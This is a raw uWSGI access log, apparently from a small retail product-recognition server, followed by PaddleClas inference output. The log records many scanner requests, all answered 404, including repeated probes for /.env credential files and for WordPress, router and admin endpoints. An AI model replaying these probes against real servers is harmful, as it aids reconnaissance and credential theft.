generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 67/74] 35.195.93.98 () {42 vars in 560 bytes} [Thu Jan 27 17:09:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 68/75] 81.39.100.157 () {34 vars in 393 bytes} [Thu Jan 27 17:11:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 69/76] 34.227.81.53 () {36 vars in 519 bytes} [Thu Jan 27 20:09:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 70/77] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 20:48:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 71/78] 1.13.189.96 () {34 vars in 367 bytes} [Thu Jan 27 22:15:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 72/79] 83.97.20.34 () {26 vars in 287 bytes} [Thu Jan 27 22:50:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 73/80] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 00:13:56 2022] GET /dispatch.asp => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 74/81] 128.1.248.42 () {34 vars in 486 bytes} [Fri Jan 28 00:49:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 75/82] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 02:15:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 76/83] 128.14.209.170 () {34 vars in 488 bytes} [Fri Jan 28 02:36:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 77/84] 128.14.209.170 () {34 vars in 508 bytes} [Fri Jan 28 02:36:41 2022] GET /analytics/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 78/85] 47.101.202.143 () {34 vars in 460 bytes} [Fri Jan 28 02:38:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 79/86] 192.241.203.213 () {34 vars in 395 bytes} [Fri Jan 28 03:21:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 80/87] 43.134.70.7 () {34 vars in 501 bytes} [Fri Jan 28 03:55:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 81/88] 183.136.225.56 () {34 vars in 456 bytes} [Fri Jan 28 03:59:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 82/89] 83.97.20.34 () {26 vars in 287 bytes} [Fri Jan 28 05:19:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 83/90] 103.203.56.1 () {34 vars in 388 bytes} [Fri Jan 28 05:33:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 84/91] 68.55.98.151 () {28 vars in 306 bytes} [Fri Jan 28 06:09:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 85/92] 91.151.93.95 () {40 vars in 627 bytes} [Fri Jan 28 06:17:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 86/93] 39.99.137.22 () {34 vars in 410 bytes} [Fri Jan 28 06:26:50 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13123|app: 0|req: 1/94] 39.99.137.22 () {32 vars in 408 bytes} [Fri Jan 28 06:26:50 2022] GET /text4041643351210 => generated 179 bytes in 243 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 7/95] 39.99.137.22 () {32 vars in 394 bytes} [Fri Jan 28 06:26:50 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 87/96] 39.99.137.22 () {32 vars in 384 bytes} [Fri Jan 28 06:26:51 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 88/97] 39.99.137.22 () {28 vars in 306 bytes} [Fri Jan 28 06:26:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 89/98] 39.99.137.22 () {36 vars in 462 bytes} [Fri Jan 28 06:27:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 90/99] 39.99.137.22 () {34 vars in 413 bytes} [Fri Jan 28 06:27:06 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 91/100] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 06:45:52 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 92/101] 172.245.189.12 () {36 vars in 524 bytes} [Fri Jan 28 06:59:36 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 93/102] 172.245.189.12 () {40 vars in 631 bytes} [Fri Jan 28 06:59:37 
2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 94/103] 47.101.162.42 () {34 vars in 434 bytes} [Fri Jan 28 07:35:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 95/104] 178.208.92.138 () {40 vars in 629 bytes} [Fri Jan 28 07:41:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 96/105] 62.171.132.199 () {40 vars in 672 bytes} [Fri Jan 28 07:42:10 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 97/106] 128.14.133.58 () {34 vars in 487 bytes} [Fri Jan 28 08:06:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 98/107] 109.237.103.9 () {36 vars in 523 bytes} [Fri Jan 28 08:10:33 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 99/108] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 08:31:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 100/109] 177.54.85.10 () {32 vars in 462 bytes} [Fri Jan 28 08:48:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 101/110] 193.118.53.210 () {34 vars in 488 bytes} [Fri Jan 28 10:27:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 102/111] 124.121.90.118 () {34 vars in 517 bytes} [Fri Jan 28 10:53:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 103/112] 83.97.20.34 () {26 
vars in 286 bytes} [Fri Jan 28 11:36:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 104/113] 192.241.212.153 () {34 vars in 413 bytes} [Fri Jan 28 11:56:33 2022] GET /config.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 105/114] 136.144.41.117 () {40 vars in 568 bytes} [Fri Jan 28 12:16:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 106/115] 47.102.137.8 () {34 vars in 433 bytes} [Fri Jan 28 12:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 107/116] 184.105.247.196 () {28 vars in 309 bytes} [Fri Jan 28 13:03:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 108/117] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 109/118] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 110/119] 107.172.73.224 () {38 vars in 654 bytes} [Fri Jan 28 14:02:09 2022] GET /wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 111/120] 107.172.73.224 () {38 vars in 627 bytes} [Fri Jan 28 14:02:09 2022] GET /xmlrpc.php?rsd => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 112/121] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 
bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 113/122] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:09 2022] GET /blog/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 114/123] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:10 2022] GET /web/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 115/124] 107.172.73.224 () {38 vars in 674 bytes} [Fri Jan 28 14:02:10 2022] GET /wordpress/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 116/125] 107.172.73.224 () {38 vars in 670 bytes} [Fri Jan 28 14:02:10 2022] GET /website/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 117/126] 107.172.73.224 () {38 vars in 660 bytes} [Fri Jan 28 14:02:10 2022] GET /wp/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 118/127] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /news/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 119/128] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:11 2022] GET /wp1/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 120/129] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /test/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 121/130] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 
14:02:11 2022] GET /wp2/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 1/131] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /site/wp-includes/wlwmanifest.xml => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 122/132] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:12 2022] GET /cms/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 2/133] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:12 2022] GET /sito/wp-includes/wlwmanifest.xml => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 123/134] 109.237.103.123 () {36 vars in 525 bytes} [Fri Jan 28 14:26:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 124/135] 188.253.46.79 () {32 vars in 463 bytes} [Fri Jan 28 14:31:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 125/136] 109.237.103.38 () {36 vars in 524 bytes} [Fri Jan 28 14:31:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 126/137] 2.187.215.249 () {32 vars in 464 bytes} [Fri Jan 28 15:00:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 127/138] 188.253.54.24 () {32 vars in 470 bytes} [Fri Jan 28 15:09:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 128/139] 162.142.125.9 () {34 vars in 442 bytes} [Fri Jan 28 15:10:13 2022] GET / => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 129/140] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 15:18:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 130/141] 35.195.93.98 () {42 vars in 562 bytes} [Fri Jan 28 16:56:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 131/142] 65.141.6.170 () {36 vars in 522 bytes} [Fri Jan 28 17:14:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 132/143] 65.141.6.170 () {40 vars in 629 bytes} [Fri Jan 28 17:14:45 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 133/144] 109.237.103.118 () {36 vars in 525 bytes} [Fri Jan 28 17:24:16 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 134/145] 83.97.20.34 () {26 vars in 287 bytes} [Fri Jan 28 17:41:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 135/146] 183.136.225.56 () {34 vars in 534 bytes} [Fri Jan 28 19:15:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 136/147] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 19:53:37 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 137/148] 62.171.132.199 () {40 vars in 672 bytes} [Fri Jan 28 20:19:35 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 138/149] 192.95.36.134 () {34 vars in 
553 bytes} [Fri Jan 28 20:46:46 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 139/150] 192.95.36.134 () {34 vars in 560 bytes} [Fri Jan 28 20:46:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 140/151] 192.95.36.134 () {38 vars in 667 bytes} [Fri Jan 28 20:46:47 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 141/152] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 21:33:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 142/153] 203.234.179.132 () {30 vars in 438 bytes} [Fri Jan 28 21:43:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 143/154] 193.118.53.194 () {34 vars in 488 bytes} [Fri Jan 28 21:47:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 144/155] 183.136.225.14 () {30 vars in 414 bytes} [Fri Jan 28 22:08:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 145/156] 183.136.225.14 () {32 vars in 475 bytes} [Fri Jan 28 22:10:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 146/157] 183.136.225.14 () {32 vars in 497 bytes} [Fri Jan 28 22:10:09 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 147/158] 183.136.225.14 () {32 vars in 495 bytes} [Fri Jan 28 22:10:16 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 
13129|app: 0|req: 148/159] 52.152.235.208 () {36 vars in 524 bytes} [Fri Jan 28 22:13:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 8/160] 52.152.235.208 () {40 vars in 631 bytes} [Fri Jan 28 22:13:22 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 9/161] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 22:14:23 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 149/162] 128.14.133.58 () {34 vars in 487 bytes} [Fri Jan 28 23:41:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 150/163] 101.132.186.179 () {34 vars in 461 bytes} [Sat Jan 29 01:14:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 151/164] 164.90.197.8 () {36 vars in 480 bytes} [Sat Jan 29 01:27:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 152/165] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 03:53:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 153/166] 192.241.213.252 () {34 vars in 395 bytes} [Sat Jan 29 03:55:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 154/167] 2.56.57.232 () {40 vars in 626 bytes} [Sat Jan 29 04:14:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 155/168] 192.241.212.78 () {34 vars in 422 bytes} [Sat Jan 29 04:56:52 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 
headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 156/169] 61.135.127.110 () {42 vars in 798 bytes} [Sat Jan 29 05:04:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 157/170] 61.135.127.110 () {42 vars in 826 bytes} [Sat Jan 29 05:04:35 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 158/171] 192.241.211.81 () {34 vars in 424 bytes} [Sat Jan 29 05:14:39 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 159/172] 83.97.20.34 () {26 vars in 286 bytes} [Sat Jan 29 05:36:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 160/173] 47.101.157.170 () {34 vars in 435 bytes} [Sat Jan 29 05:38:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 161/174] 136.144.41.117 () {40 vars in 568 bytes} [Sat Jan 29 06:25:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 162/175] 91.205.64.46 () {32 vars in 463 bytes} [Sat Jan 29 06:43:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 07:57:23 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 07:57:23 INFO: DetPostProcess : +2022-01-29 07:57:23 INFO: DetPreProcess : +2022-01-29 07:57:23 INFO: transform_ops : +2022-01-29 07:57:23 INFO: DetResize : +2022-01-29 07:57:23 INFO: interp : 2 +2022-01-29 07:57:23 INFO: keep_ratio : False +2022-01-29 07:57:23 INFO: target_size : [640, 640] +2022-01-29 07:57:23 INFO: DetNormalizeImage : +2022-01-29 07:57:23 INFO: is_scale : True +2022-01-29 07:57:23 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 07:57:23 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 07:57:23 INFO: DetPermute : +2022-01-29 07:57:23 INFO: Global : +2022-01-29 07:57:23 INFO: batch_size : 1 +2022-01-29 07:57:23 INFO: cpu_num_threads : 1 +2022-01-29 07:57:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 07:57:23 INFO: enable_benchmark : True +2022-01-29 07:57:23 INFO: enable_mkldnn : True +2022-01-29 07:57:23 INFO: enable_profile : False +2022-01-29 07:57:23 INFO: gpu_mem : 8000 +2022-01-29 07:57:23 INFO: image_shape : [3, 640, 640] +2022-01-29 07:57:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 07:57:23 INFO: ir_optim : True +2022-01-29 07:57:23 INFO: labe_list : ['foreground'] +2022-01-29 07:57:23 INFO: max_det_results : 5 +2022-01-29 07:57:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 07:57:23 INFO: rec_nms_thresold : 0.05 +2022-01-29 07:57:23 INFO: threshold : 0.2 +2022-01-29 07:57:23 INFO: use_fp16 : False +2022-01-29 07:57:23 INFO: use_gpu : False +2022-01-29 07:57:23 INFO: use_tensorrt : False +2022-01-29 07:57:23 INFO: IndexProcess : +2022-01-29 07:57:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 07:57:23 INFO: return_k : 5 +2022-01-29 
07:57:23 INFO: score_thres : 0.5 +2022-01-29 07:57:23 INFO: RecPostProcess : None +2022-01-29 07:57:23 INFO: RecPreProcess : +2022-01-29 07:57:23 INFO: transform_ops : +2022-01-29 07:57:23 INFO: ResizeImage : +2022-01-29 07:57:23 INFO: size : 224 +2022-01-29 07:57:23 INFO: NormalizeImage : +2022-01-29 07:57:23 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 07:57:23 INFO: order : +2022-01-29 07:57:23 INFO: scale : 0.00392157 +2022-01-29 07:57:23 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 07:57:23 INFO: ToCHWImage : None +Inference: 375.7486343383789 ms per batch image +[{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865}] +{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865} +234 +["{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 163/176] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 07:57:21 2022] POST /reference_client/ => generated 126 bytes in 3664 msecs (HTTP/1.1 200) 5 headers in 158 bytes (27 switches on core 0) +req +2022-01-29 08:05:18 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 08:05:18 INFO: DetPostProcess : +2022-01-29 08:05:18 INFO: DetPreProcess : +2022-01-29 08:05:18 INFO: transform_ops : +2022-01-29 08:05:18 INFO: DetResize : +2022-01-29 08:05:18 INFO: interp : 2 +2022-01-29 08:05:18 INFO: keep_ratio : False +2022-01-29 08:05:18 INFO: target_size : [640, 640] +2022-01-29 08:05:18 INFO: DetNormalizeImage : +2022-01-29 08:05:18 INFO: is_scale : True +2022-01-29 08:05:18 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 08:05:18 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 08:05:18 INFO: DetPermute : +2022-01-29 08:05:18 INFO: Global : +2022-01-29 08:05:18 INFO: batch_size : 1 +2022-01-29 08:05:18 INFO: cpu_num_threads : 1 +2022-01-29 08:05:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 08:05:18 INFO: enable_benchmark : True +2022-01-29 08:05:18 INFO: enable_mkldnn : True +2022-01-29 08:05:18 INFO: enable_profile : False +2022-01-29 08:05:18 INFO: gpu_mem : 8000 +2022-01-29 08:05:18 INFO: image_shape : [3, 640, 640] +2022-01-29 08:05:18 INFO: infer_imgs : 